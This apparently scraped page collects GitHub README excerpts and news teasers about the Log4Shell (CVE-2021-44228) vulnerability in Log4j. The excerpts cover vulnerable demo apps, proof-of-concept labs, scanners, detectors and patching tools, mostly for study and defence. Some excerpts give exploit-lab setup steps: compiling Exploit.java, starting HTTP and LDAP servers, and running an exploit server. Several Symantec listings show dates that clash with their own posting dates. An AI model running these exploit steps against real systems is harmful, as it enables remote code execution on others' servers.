java-slf4j-logging-example Log Level Just a clarification about the set of all possible levels, which are: ALL < TRACE < DEBUG < INFO < WARN < ERROR < FATAL < OFF If the system's log level is INFO, then logs of the WARN, ERROR, FATAL, and OFF levels can be output normally Level Descript

A simple simulation of the infamous CVE-2021-44228 issue.

CVE-2021-44228 This repository represents a simplified simulation of the infamous CVE-2021-44228 issue Aside from system properties and other dictionary-structure lookups, Apache Log4j also implements a JNDI lookup feature for various reasons JNDI can obtain services from a number of service providers, such as LDAP, DNS, the Java RMI registry, etc JNDI itself is a simple and

Playground repo to try out Log4j related things

Learning-Log4j2 Background See github.com/vorburger/Log4j_CVE-2021-44228 Providers & Priorities $ ./gradlew run Jan 14, 2022 6:30:52 PM ch.vorburger.log4j.App main INFO: hello, world As we can see, this logged "hello, world" using JUL to the console (unless otherwise configured) It uses the (new) log4j-to-jul mo

LOG4SHELL-CVE-2021-44228-Validator About This tool allows you to verify whether a simple Java web app is vulnerable to CVE-2021-44228 for a user-provided version of Java and of Log4J You can also [optionally] apply one of a few pre-defined mitigations The simulation lab spun up by log4shell_validator.py uses docker-compose to simulate exploiting the log4j vulnerability and

sample-vulnerable-log4j-direct-app This repository is a sample repository that is vulnerable to CVE-2021-44228 Repro of vulnerability First, visit canarytokens.org/ and create a new Log4Shell token (that emails you when it gets triggered) Then run the following command in this repository, where the --args value is the ${jndi:} value that you got when creating the ca

A Terraform to deploy a vulnerable app and a JNDIExploit to work with CVE-2021-44228

log4j-vulnerable-app-cve-2021-44228-terraform A Terraform to deploy a vulnerable app and a JNDIExploit to work with CVE-2021-44228 About Stack This terraform creates two instances in a VPC in AWS Cloud You just need to export your AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY One instance is JNDIExploit The second is a Vulnerable-App for the log4j exploit Please replace your SSH-Public-Ke

sample-vulnerable-log4j-indirect-app This repository is a sample repository that is vulnerable to CVE-2021-44228 because it indirectly depends on a vulnerable version of log4j via its dependency on github.com/sgtest/sample-vulnerable-log4j-direct-lib Repro of vulnerability First, visit canarytokens.org/ and create a new Log4Shell token (that emails you when it g

Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046

log4shelltools log4shelltools is a tool that allows you to run a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046 This is the code that runs log4shell.alexbakker.me If you'd like to inspect the code or run an instance in your own environment, you've come to the right place

Log4jExploitDemo A log4j vulnerable app used in a log4j session as a demo and proof of concept for the recently discovered CVE-2021-44228 vulnerability Setup and exploitation Steps Compile Exploit.java and start http server cd Log4jExploitDemo/exploit javac Exploit.java start http server, python: python3 -m http.server or php: php -S 127.0.0.1:8000 Start ldap server git

MIDF Internship

Learn From Internship [Since 11 October 2022] CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell) – This issue happens on 6 December 2021 Windows Command Prompt: • shutdown -s -t 5: It means that the computer will shut down after 5 seconds Ubuntu Terminal Learning (cowsay): • uname &

Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j CVE-2021-44228 RCE Vulnerability)

Log4j Vulnerability - Proof-of-concept This repo has the docker and k8s YAMLs that are needed to recreate the log4j vulnerability (see below) Follow this blog to understand how all of this is tied together Build Docker Images In case you need to customize the docker images cd <Git-Repo>/web-server make build push cd

log4shell CVE-2021-44228 - demo :) 1 Run log4shell vuln app podman run -p 8080:8080 quay.io/apoczeka/log4shell-vuln:latest 2 Run "exploit server" podman run -p 1389:1389 -p 8888:8888 quay.io/apoczeka/log4shell -i <host_address> -l 1389 -p 8888 <host_address> i

C parody of log4j

log4c C parody of the log4j RCE exploit (CVE-2021-44228) Logs stuff to console, also happens to run ${expressions} for convenience :) Build instructions (with MinGW Makefiles generator) Replace the generator with whatever you use mkdir build cd build cmake -G "MinGW Makefiles" .. cmake --build . Don't actually use this

CVE-2021-44228 (Apache Log4j Remote Code Execution) all log4j-core versions >=2.0-beta9 and <=2.14.1 The 1.x versions have other vulnerabilities; we recommend that you update to the latest version Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228) Usage: download this project, compile the exploit code blob/master/src/main/java/Exploit.java, an

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181 Running the application Run it: docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@

Simple demo for Anchore Enterprise, including with multiple CICD workflow examples.

2022-09-enterprise-demo Simple demo for Anchore Enterprise Includes workflow examples for Jenkins, CircleCI, Codefresh, Drone, and GitHub Partial list of conditions that can be tested with this image: xmrig cryptominer installed at /xmrig/xmrig simulated AWS access key in /aws_access simulated ssh private key in /ssh_key selection of commonly-blocked packages installed (

Log4j-IOCs 21 Dec 2021 21 December 2021 IP address list


Detector for Log4Shell exploitation attempts

log4shell-detector Detector for Log4Shell exploitation attempts What it does and doesn't do It does: It checks local log files for indicators of exploitation attempts, even heavily obfuscated ones that string or regular expression based patterns wouldn't detect It doesn't find vulnerable applications It doesn't and can't verify if the exploitation att

An agent-based approach to mitigating log4shell

JndiLookupRemover A Java agent which mitigates CVE-2021-44228 (log4shell) by patching the JndiLookup class How to use Download the latest release and add it as a Java agent to your application using -javaagent:<release jar path> What it does JndiLookupRemover patches log4j so that JNDI lookups return the static string !!PREVENTED JNDI LOOKUP!! This prevents the

OpenCensus - A stats collection and distributed tracing framework ❗ The opencensus-contrib-log-correlation-log4j2 Java client library is part of the OpenCensus project CVE-2021-44228 and CVE-2021-45046 disclosed security vulnerabilities in Apache Log4j 2 version 2.15 or below The recent version v0.28.3 depends on Log4j 2.11.1 A number of previous versions also

Exploits for sbomexe The commands needed to run the fingerprint phase and the agent h2-console (CVE-2021-42392) fingerprint java -jar classfile-fingerprint/target/classfile-fingerprint-0131-SNAPSHOTjar jdk -o /sbjsonl java -jar classfile-fingerprint/target/classfile-fingerprint-0131-SNAPSHOTjar supply-chain -i /sb1jsonl -s ~/Desktop/chains/sbomexe-poc/h2-consol

A python interface for the NVD API, not endorsed by NVD.

NVDInterface NVDInterface is a python library to simplify retrieving and interacting with data from the National Vulnerability Database (NVD) This project is currently in the early stages of development and will hopefully see changes soon; however, it is being made available early for others to use, test, and request changes on Install (venv) $ pip install nvdinterface

AWS Shell for FireSim

AWS FPGA Shell for FireSim This is a fork of aws-fpga used for FireSim More information about this repo can be found in the FireSim Changelog Below is the standard aws-fpga documentation from upstream Table of Contents Overview of AWS EC2 FPGA Development Kit Developer Support Development Flow Development environments FPGA Developer AMI FPGA Hardware Development Kit (HDK)

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it Proof-of-concept (POC) As a

log4jdockerfile

log4jpwn log4j rce test environment See: www.lunasec.io/docs/blog/log4j-zero-day/ This repository contains an intentionally vulnerable playground to play with CVE-2021-44228 (aka: log4shell) Experiments to trigger the vulnerability in various software products mentioned here can be found in the vuln-software/ directory examples using the included python poc build Ei

Vulnerability data analysis system System entity relationships This system contains the following main entities and their relationships: Vulnerability Attributes: cve_id, published_date, description, CPEs, CWE, CVSS2 Relationships: AFFECT -> Software AFFECT_VERSION -> Version FIX -> Software Software (component) Attributes: name, author, url Relationships: HAS -> Version REUSE ->

Log4Shell Exploiter - Agent Plugin for Infection Monkey Introduction Log4Shell Exploiter is an Agent Plugin for Infection Monkey that exploits CVE-2021-44228 It affects Apache Log4j, a Java logging framework The plugin will attempt to exploit the vulnerability in three services: Apache Solr Apache Tomcat Logstash For more information, see the Log4Shell Exploiter Plugin do

AIG Shield Up Cybersecurity Program The AIG Shield Up Cybersecurity Program is a virtual internship hosted on Forage 👉 Learn more and participate here From Simulation to Reality: Tackling Zero-Day Vulnerabilities and Ransomware Attacks Time Period: June 2024 Overview This repository contains insights and strategies I developed while participating in the AIG Cybersecurity Vi

OpenSCA is an open source software supply chain security solution that supports the detection of open source dependencies, vulnerabilities and license compliance with a widely noticed accuracy by the community.

Manage Open Source Risks via Open Source Solution English|Chinese Introduction Detection Ability Download & Deployment Use OpenSCA Parameters Report Formats Sample Scan & Report via Docker Container Local Vulnerability Database The Format of the Vulnerability Database File Explanations of Vulnerability Database Fields Sample of Setting the Vulnerabi

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2.14.1 (through spring-boot-starter-log4j2 2.6.1) and the JDK 1.8.0_181 Running the application Run it: docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

log4cats Project Goals log4cats attempts to make referentially transparent logging a reality These F algebras allow you to write code for logging knowing you won't be doing side-effects as it offers no way to do so We provide our own slf4j layer, or you can use any of the supported backends, or create your own Quick Start To use log4cats in an existing SBT project wit

minecraft-ctf Introduction Welcome to minecraft-ctf, a unique CTF challenge created especially for you! Your task will be to capture the flag by exploiting the Log4j vulnerability together with a few other tools, and best of all, using a game that probably everyone knows! Get ready for a fascinating challenge! Fruitful hacking and have fun! CTF rules Run

This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation.

Log4Shell This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation What is Log4Shell? The CVE-2021-44228 / Log4Shell vulnerability consists of injecting vulnerable software with a malicious payload, which will ask Log4J to obtain a value from a third-party source, with JNDI and through the LDAP protocol The imported data can be code, w

Sysdig Onprem Install Documentation The Sysdig Platform is a highly available application for securing and monitoring cloud-native infrastructures Table of Contents Oversight Services Now Offered for All Installs and Upgrades Supported Migration Paths Oversight Services Now Offered for All Installs and Upgrades Note As part of our continued focus on our customers, we are no

Log4shell Updater Documentation Table of Contents English What exactly does the tool do? Compatible iFinder versions How to apply the tool step-by-step: German What exactly does the tool do? Compatible iFinder versions How to apply the tool step by step: English In order to close vulnerabilities related to the log4shell problem (CVE-2021-44228) we prov

Java Software Security Course Work and Projects

CS-305 Java Software Security Course Work and Projects Alexandrea Teigeler 2022 #--------------------------------------------------------------------------------------------------------------# Briefly summarize your client, Artemis Financial, and their software requirements #--------------------------------------------------------------------------------------------------------

just a temp area for a few trials, please don't clone :)

This is the WORK-IN-PROGRESS repository for Mark59 - be aware it may NOT always be in a completely consistent state Mark59 Documentation, Guides, Downloads and More Available at the www.mark59.com website Releases Release 6.0-beta-2 Refine Playwright Options for Scripting Scripting samples moved to mark59-scripting-samples, mark59-scripting-sample-dsl Cr

Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228

Log4j Updater With the inevitable need to update the famous Java framework called Log4j, numerous companies are needing to update Log4j on several computers at the same time, which takes time and cost, and that's where the Log4j Updater comes in log4jupdater.sh is a simple bash script with the aim of automatically detecting the package manager to be used by the system and

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading The script "log4j-detect.py" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228 To do so, it sends a GET request using threads (higher performance) to each of th

my awesome star list

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents C C# C++ CSS CUE Clojure Dockerfile Go HCL HTML Haskell Java JavaScript Jinja Jsonnet Jupyter Notebook Just Lua MDX Makefile Markdown Mustache Open Policy Agent Others Python Riot Roff Ruby Rust SCSS Shell Smarty Starlark Svelte Swift TypeScript Vim Script Vue C appview-team/appview - Gain ins

Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228 introduction A Remote Code Execution vulnerability has been found related to the Java logging library Log4j CVE-2021-44228 This vulnerability has caused a stir in the global cyber community; since WannaCry we have not seen such an impact. The reason: most apps written in Java are thought to be affected and vulnerable, parti

Log4jSherlock Version 1020211219 Overview Log4j Scanner coded in PowerShell, so you can run it in Windows! This tool scans for JAR, WAR, EAR, JPI, HPI that contain the affected JndiLookup.class even in nested files Scans nested files searches for the affected JNDI class pulls version and reports in CSV, JSON, and txt log reports errors, i.e. access issues to folders where

Web Security Experimental Spring Application for TIC4304

Content Management System MVC This is a simple Spring MVC 5.x application project built with Maven, incorporating dependencies such as Bootstrap, J2EE and the Spring Security Module Originally built for an interview coding assignment even though the author did not eventually work for that company Full source code is released under GNU GPL v3 PS The project is misnamed CRMMVC, sho

Vulnerable Spring Boot 2 Java Web Application - CVE-2021-44228 - Log4Shell This Spring Boot Application contains a vulnerable log4j (version 2.14.1) logging dependency that is exploitable with CVE-2021-44228 git clone github.com/gramou/vuln-log4j2.git cd vuln-log4j2 sudo docker build -t vulnlog4j2

cve-2021-44228-log4j-test Test 1 LDAP server and hack-file download server 1.1 Run Docker-compose docker-compose.yml version: '2' services: dockerdj: image: openidentityplatform/opendj:latest container_name: ldap environment: ROOT_USER_DN: "cn=han" ROOT_PASSWORD: "han" BASE_DN: "dc=bumbing,dc=x

Third party message exporter made in golang

Message Format Slack { "applicatoin": "slack", "webhookUrl": "<SLACK_WEBHOOK_URL>", "scanType": "image_scan", "vulnerabilities": [ {"cve": "CVE-2021-44228", "severity": "Critical", "description": "Log4j vulnerability&

Fixes CVE-2021-44228 in log4j by patching JndiLookup class

log4j-vulnerability-patcher-agent This agent fixes critical vulnerability CVE-2021-44228 in log4j by patching the JndiLookup class, as recommended here WARNING: this is not a substitute for a proper upgrade to log4j 2.15.0, where this vulnerability was fixed for good Use this agent IF, and ONLY IF, you can't upgrade log4j in your app Agent can run on JRE 8 and higher, in any

tests with HC Vault and NTC

Hashi Vault JS This module provides a set of functions to help JavaScript Developers working with HashiCorp Vault to authenticate and access API endpoints using JavaScript promises This package is NOT affected by the log4shell CVE-2021-44228 vulnerability! Requirements (MacOS/Windows) NodeJs Minimum: v16.x Recommended: v18.x npm Tested on: v9.2.x HashiCorp Vault

Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.

Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability with custom payloads Disclaimer I am not responsible for your actions, burp-suite freezing, target getting hacked, thermonuclear war, or the current economic crisis caused by you following these directions YOU are choosing to use this to

Minecraft Vagrantbox for Log4Shell demo

LastLog4J - Demo VM for Log4Shell This project is a semi-automated homelab for exploiting the Log4Shell (CVE-2021-44228) vulnerability in Minecraft This CTF style lab has a flag called ~/secrets.txt The goal is to use the malicious LDAP server running on 1723015 to get Remote Code Execution within the game and read the contents of the file Background Back in Dec 2

Log4j2 LDAP vulnerability test (CVE-2021-44228)

Log4j2 2.14.1 LDAP remote code execution vulnerability (CVE-2021-44228) check 🎈 Tested in a Spring Boot 2.x environment Vulnerability notice nvd.nist.gov/vuln/detail/CVE-2021-44228 target-server pom.xml : Log4j2 version lowered to a vulnerable version <properties> <java.version>17</java.version> <!-- currently configured Sp

Codeql study notes Codeql overview Codeql is essentially about writing all kinds of filter conditions and data-flow tracking; it feels like writing object-oriented SQL. It is recommended to first master object-oriented thinking, one object-oriented programming language, and how to write SQL. Codeql works mainly by analyzing code relationships with an analysis engine to generate a code database, after which the QL language can be used to perform all kinds of

Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

log4shell-dockerlab Credits All credit goes to the original authors I just git-cloned and created a docker-compose file, that's all LunaSec - log4shell 0-day @christophetd - log4shell-vulnerable-app @mbechler - marshalsec @tangxiaofen7 - Exploit.java Description This repository contains a docker-compose setup which starts an attacker LDAP server and a victim web serve

Log4j Shell Poc This is a simple example only used to study the cause/behaviors/capabilities of CVE-2021-44228 vuln-pakgs Old versions of log4j packages that are needed to perform CVE-2021-44228 POC vuln-app Contains a vulnerable java app using Log4j and an attack shell script to test the concept of vulnerability

Little recap of the log4j2 remote code execution (CVE-2021-44228)

Little recap of the log4j2 remote code execution (CVE-2021-44228) Requirements maven >= 3 java >= 8 no running ldap on 127.0.0.1:1389 Usage Build with maven mvn test The surefire plugin will be executed two times: ExploitabilityTest proves the exploitability of the bug MitigationTest will be executed with the vm prop

We are providing DevOps and security teams a script to identify cloud workloads that may be vulnerable to the Log4j vulnerability (CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Introduction We are providing DevOps and security teams a script to identify cloud workloads that may be vulnerable to the Log4j vulnerability (log4shell) in their AWS account We currently support the "CVE-2021-44228" and "CVE-2021-45046" RCE vulnerabilities The script enables security teams to identify external-facing AWS assets by running the exploit on them, a

My starred Repos

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ai algorithm analytics android angular ansible api archlinux arduino artificial-intelligence automation awesome awesome-list aws azure backend bash bootstrap bot c chatgpt chatgpt-api chrome chrome-extension cli clojure code compiler computer-science cpp csharp css cybersecurity dart data-analys

Recent Articles

Log4j Vulnerabilities: Attack Insights
Symantec Threat Intelligence Blog • Siddhesh Chandrayan • 23 Dec 2025

Symantec data shows variation and scope of attacks.

Posted: 23 Dec, 2021 | 4 Min Read | Threat Intelligence. Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...

Apache Log4j Zero-Day Being Exploited in the Wild
Symantec Threat Intelligence Blog • Threat Hunter Team • 11 Dec 2025

Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability

Posted: 11 Dec, 2021 | 1 Min Read | Threat Intelligence. A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...

Budworm: Espionage Group Returns to Targeting U.S. Organizations
Symantec Threat Intelligence Blog • 13 Oct 2025

Recent attacks by the group have spanned continents and include the first confirmed attacks seen against the U.S. in a number of years.

Posted: 13 Oct, 2022. The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a mul...

Ransomware: How Attackers are Breaching Corporate Networks
Symantec Threat Intelligence Blog • Karthikeyan C Kasiviswanathan Vishal Kamble • 28 Apr 2025

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Posted: 28 Apr, 2022. Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...

Stonefly: North Korea-linked Spying Operation Continues to Hit High-value Targets
Symantec Threat Intelligence Blog • Threat Hunter Team • 27 Apr 2025

Espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.

Posted: 27 Apr, 2022. The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...

The Threat Landscape in 2021
Symantec Threat Intelligence Blog • Threat Hunter Team • 19 Jan 2025

Symantec takes a look at the cyber security trends that shaped the year

Posted: 19 Jan, 2022. From the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021. A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at some of the major thre...

IT threat evolution in Q3 2023. Non-mobile statistics
Securelist • AMR • 01 Dec 2023

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: According to Kaspersky Security Network, in Q3 2023: Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe. A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus components. Attempts to run malware for stealing money from online bank accounts were stopped on the com...

IT threat evolution in Q2 2023. Non-mobile statistics
Securelist • AMR • 30 Aug 2023

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: According to Kaspersky Security Network, in Q2 2023: Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe. A total of 209,716,810 unique links were detected by Web ...

IT threat evolution in Q1 2023. Non-mobile statistics
Securelist • AMR • 07 Jun 2023

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: According to Kaspersky Security Network, in Q1 2023: Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe. Web Anti-Virus detected 246,912,694 unique URLs ...

IT threat evolution in Q3 2022. Non-mobile statistics
Securelist • AMR • 18 Nov 2022

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: According to Kaspersky Security Network, in Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...

IT threat evolution in Q2 2022. Non-mobile statistics
Securelist • AMR • 15 Aug 2022

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures: According to Kaspersky Security Network, in Q2 2022: Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe. Web Anti-Virus recognized 273,033,368 unique URLs as ma...

Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz
The Register • Gareth Corfield • 11 Jan 2022

It's not as though folks haven't been warned about this

There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks. Tracked as CVE-2021-44228 aka L...

You better have patched those Log4j holes or we'll see what a judge has to say – FTC
The Register • Thomas Claburn in San Francisco • 05 Jan 2022

Apply fixes responsibly in a timely manner or face the wrath of Lina Khan

The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...

Bad things come in threes: Apache reveals another Log4J bug
The Register • Simon Sharwood, APAC Editor • 19 Dec 2021

Third major fix in ten days is an infinite recursion flaw rated 7.5/10

The Apache Software Foundation (ASF) has revealed a third bug in its Java-based open-source logging library Log4j. CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j. That’s the third new version of the tool in the last ten days. In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remote code execution f...

CISA issues emergency directive to fix Log4j vulnerability
The Register • Thomas Claburn in San Francisco • 17 Dec 2021

Federal agencies have a week to get their systems patched

The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021. Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a wee...

As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others
The Register • Chris Williams, Editor in Chief • 15 Dec 2021

Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog

Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Successful...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Now open-source logging library's JNDI disabled entirely by default, message lookups removed

Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...

Popular password manager LastPass to be spun out from LogMeIn
The Register • Jude Karabus • 14 Dec 2021

Private equity owners play pass the parcel

One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation. "The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners. Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools – which a...

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching
The Register • Gareth Corfield • 13 Dec 2021

This might be the bug that deserves the website, logo and book deal

Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones. Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post. Apache Log4j is an open-source logging utility written in Java that is used all over the world in many software packag...

Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility
The Register • Gareth Corfield • 10 Dec 2021

Prepare to have a very busy weekend of mitigating and patching

An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers. Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation." Crafted proof-of-concept code snippet...

LockBit victims in the US alone paid over $90m in ransoms since 2020
The Register

As America, UK, Canada, Australia and friends share essential bible to detect and thwart infections

Seven nations today issued an alert, plus protection tips, about LockBit, the prolific ransomware-as-a-service gang. The group's affiliates remain a global scourge, costing US victims alone more than $90 million from roughly 1,700 attacks since 2020, we're told. The joint security advisory — issued by the US Cybersecurity and Infrastructure Security Agency (CISA), FBI, Multi-State Information Sharing and Analysis Center (MS-ISAC), and cybersecurity authorities in Australia, Canada, the UK, Ge...

China's APT40 gang is ready to attack vulns within hours or days of public release.
The Register

Lax patching and vulnerable small biz kit make life easy for Beijing's secret-stealers

Law enforcement agencies from eight nations, led by Australia, have issued an advisory that details the tradecraft used by China-aligned threat actor APT40 – aka Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk – and found it prioritizes developing exploits for newly found vulnerabilities and can target them within hours. The advisory describes APT40 as a "state-sponsored cyber group" and the People's Republic of China (PRC) as that sponsor. The agencies that authored the advis...

Triton malware still a threat to energy sector, FBI warns
The Register • Jessica Lyons Hardcastle • 28 Mar 2022

Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad

In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning. Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility. The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and control crit...

It’s time to fill those cloud security gaps
The Register

Here’s how Wiz can help

Sponsored Feature When software vulnerabilities and zero days moved up the enterprise worry list 15 years ago, nobody imagined the world would one day end up with a threat as perplexing as Log4Shell – a vulnerability in the Apache Log4j open source logging framework that's used in software on all major operating systems spanning everything from cloud services to PC games. In what might be called the happier days of the past, flaws were something that affected single applications and individual...

VMware Horizon platform pummeled by Log4j-fueled attacks
The Register • Jeff Burt • 30 Mar 2022

Miscreants deployed cryptominers, backdoors since late December, Sophos says

VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware. In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos research...

Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns
The Register

Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs

The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers – tracked as CV...

Memory-safe languages so hot right now, agrees Lazarus Group as it slings DLang malware
The Register

Latest offensive cyber group to switch to atypical programming for payloads

Research into Lazarus Group's attacks using Log4Shell has revealed novel malware strains written in an atypical programming language. DLang is among the newer breed of memory-safe languages being endorsed by Western security agencies over the past few years, the same type of language that cyber criminals are switching to. At least three new DLang-based malware strains have been used in attacks on worldwide organizations spanning the manufacturing, agriculture, and physical security industries, C...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 28 Apr 2022

Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021, according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies. It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years. Of course, the US Cyb...

References

CWE-20, CWE-400, CWE-502, CWE-917